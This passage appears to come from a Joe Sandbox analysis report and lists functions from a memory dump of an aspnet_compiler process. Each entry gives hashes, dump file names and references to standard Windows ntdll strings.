                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                Function 00A5FD5C Relevance: .0, Instructions: 6COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                                • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                                Function 00A5FEA0 Relevance: .0, Instructions: 6COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                                • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                                Function 00A5FED0 Relevance: .0, Instructions: 6COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                Function 00A5FE24 Relevance: .0, Instructions: 6COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                                • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                                Function 00A5FFB4 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                Function 00A5FFFC Relevance: .0, Instructions: 6COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                                • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                                Function 00A5FF34 Relevance: .0, Instructions: 6COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                                • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                                Function 00A88788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                • WindowsExcludedProcs, xrefs: 00A887C1
                                                                • Kernel-MUI-Number-Allowed, xrefs: 00A887E6
                                                                • Kernel-MUI-Language-Allowed, xrefs: 00A88827
                                                                • Kernel-MUI-Language-SKU, xrefs: 00A889FC
                                                                • Kernel-MUI-Language-Disallowed, xrefs: 00A88914
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID: _wcspbrk
                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                • API String ID: 402402107-258546922
                                                                • Opcode ID: 1bb3c2015eec8bea645c1853a9048df3160abc3b9b0db5abd8d24119c423d36e
                                                                • Instruction ID: 34e3e62e060fb97870687515be0e53badc884051f71f8d2b49930bb397a2f001
                                                                • Opcode Fuzzy Hash: 1bb3c2015eec8bea645c1853a9048df3160abc3b9b0db5abd8d24119c423d36e
                                                                • Instruction Fuzzy Hash: 45F1F7B6D00209EFCF11EFA4CA81DEEBBB9FF08300F55446AE505A7251EB359A45DB60
                                                                Function 00AF822C Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID: _wcsnlen
                                                                • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                                • API String ID: 3628947076-1387797911
                                                                • Opcode ID: 5e237c1390d0fad2efb15f8bfa9861c25a520b6e7d5051f557b5c14475bf73ae
                                                                • Instruction ID: cc9e28c0bdb0e256fd55b716b985b05c790c7a5ef9f64c94276b59cc40c71a9d
                                                                • Opcode Fuzzy Hash: 5e237c1390d0fad2efb15f8bfa9861c25a520b6e7d5051f557b5c14475bf73ae
                                                                • Instruction Fuzzy Hash: 9741967624020DBAEB119AE1CE42FFE77ACAF05B44F104612BB04DA191DBB4DB549BA4
                                                                Function 00AA13CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                • Opcode ID: cc76038ae178120bad128c3611e55006740ad2fb8fd63ae3971872cdc00d5029
                                                                • Instruction ID: 934861940858e62bc8663a405e11d3bb5ad8bd533be73cbca29b94c200e3468f
                                                                • Opcode Fuzzy Hash: cc76038ae178120bad128c3611e55006740ad2fb8fd63ae3971872cdc00d5029
                                                                • Instruction Fuzzy Hash: 0261F4B1A04655BBCF24DF9DC8808BFBBF5EF9A300B14C52DE4964B581D734AA40DBA0
                                                                Function 00B03B8E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                • Opcode ID: 4a20b178254dc89183477ed8e7a95526722b964bfacca41fa29fb95f4c03b3e8
                                                                • Instruction ID: 92a7e08b3d7b23412b6f72462c3008885b43b98e57cd6bd8ff0e25d0b3998a16
                                                                • Opcode Fuzzy Hash: 4a20b178254dc89183477ed8e7a95526722b964bfacca41fa29fb95f4c03b3e8
                                                                • Instruction Fuzzy Hash: 5A619F72900748BEDB249F99C9444BA7FF9FF54710B14C5AAF8A9A7181E234EB809B50
                                                                Function 00A97EFD Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 127COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00AB3F12
                                                                Strings
                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00AB3F4A
                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 00ABE345
                                                                • Execute=1, xrefs: 00AB3F5E
                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00AB3F75
                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00ABE2FB
                                                                • *{, xrefs: 00A97F1E
                                                                • ExecuteOptions, xrefs: 00AB3F04
                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00AB3EC4
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID: BaseDataModuleQuery
                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$*{
                                                                • API String ID: 3901378454-3092448574
                                                                • Opcode ID: f0e9d02a604a7e0c033a910daa774fba14439e040a938f2be15d454e8613eb11
                                                                • Instruction ID: e727a6b8663a02ce7640d60ea87f386d314bd6dd0fc3ac72a1b486f5159e714e
                                                                • Opcode Fuzzy Hash: f0e9d02a604a7e0c033a910daa774fba14439e040a938f2be15d454e8613eb11
                                                                • Instruction Fuzzy Hash: 43418572A9061C7ADF20DBA49C86FEE73FCAB54740F0005A9B509F6182EE70DB458B61
                                                                Function 00AA0B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID: __fassign
                                                                • String ID: .$:$:
                                                                • API String ID: 3965848254-2308638275
                                                                • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                • Instruction ID: 012754ba1faf59ee6bbf97a33082c0135d5a3737422e9586126926f3a7d81d8c
                                                                • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                • Instruction Fuzzy Hash: E2A18A71E0030AEFCF24CF64C945EBEB7B4AF16365F24856AD842A72C2D7349A41CB51
                                                                Function 00AA0554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AC2206
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 885266447-4236105082
                                                                • Opcode ID: 8db9c8eaad6cb5a5bb47c3bb9a9c02548a6d9984fdd488845373f53707b4046f
                                                                • Instruction ID: f8f0afc224f33f542c431101d8d655d62e8ff46f2bbb38ffe56b49321f4fd71d
                                                                • Opcode Fuzzy Hash: 8db9c8eaad6cb5a5bb47c3bb9a9c02548a6d9984fdd488845373f53707b4046f
                                                                • Instruction Fuzzy Hash: 8E512832B402016FEB15DB18CC81FA673A9AF99720F26822DFD55DF286DA71EC418790
                                                                Function 00AA14C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ___swprintf_l.LIBCMT ref: 00ACEA22
                                                                  • Part of subcall function 00AA13CB: ___swprintf_l.LIBCMT ref: 00AA146B
                                                                  • Part of subcall function 00AA13CB: ___swprintf_l.LIBCMT ref: 00AA1490
                                                                • ___swprintf_l.LIBCMT ref: 00AA156D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
